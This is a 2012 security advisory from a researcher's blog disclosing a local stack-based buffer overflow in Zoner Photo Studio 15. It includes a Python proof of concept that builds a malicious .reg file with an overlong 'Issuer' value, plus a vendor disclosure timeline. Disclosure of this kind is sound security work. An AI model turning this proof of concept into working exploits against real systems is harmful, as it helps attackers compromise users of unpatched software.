Julien Ahrens === @MrTuxracer

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

[IA42] Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Local Buffer Overflow

08 Nov 2012 » Advisory

Inshell Security Advisory

Inshell Security Advisory
https://www.rcesecurity.com

1\. ADVISORY INFORMATION
-----------------------
Product:        Zoner Photo Studio
Vendor URL:     www.zoner.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2012-10-17
Date published: 2012-11-09
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -

2\. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.

3\. VERSIONS AFFECTED
--------------------
Zoner Photo Studio 15 Build 3
Zoner Photo Studio 15 Build 2, older versions may be affected too.

4\. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in Zoner
Photo Studio 15 Build 2 and 3.

When launching, the application loads the "Issuer" value from the
registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]", but it does not validate the length of the
string loaded from the key before passing it to a buffer, which leads to
a stack-based buffer overflow.

An attacker needs to force the victim to import an arbitrary .reg file
to exploit this vulnerability.

5\. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python

file="poc.reg"

junk1="\x41" * 2140
boom="\x42\x42\x42\x42"
junk2="\x43" * 1000

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";

For technical details, screenshots and/or PoCs visit:
http://security.inshell.net/advisory/42

6\. SOLUTION
-----------
None

7\. REPORT TIMELINE
------------------
2012-10-17: Initial notification sent to vendor about bug in Build 2
2012-10-18: Vendor Feedback / Response
2012-10-22: Short vendor statement about expected delay
2012-10-29: Notification about the disclosure date
2012-**-**: Vendor releases Build 3 which is still vulnerable
2012-11-09: No response
2012-11-09: Full Disclosure according to disclosure policy

8\. REFERENCES
-------------
http://security.inshell.net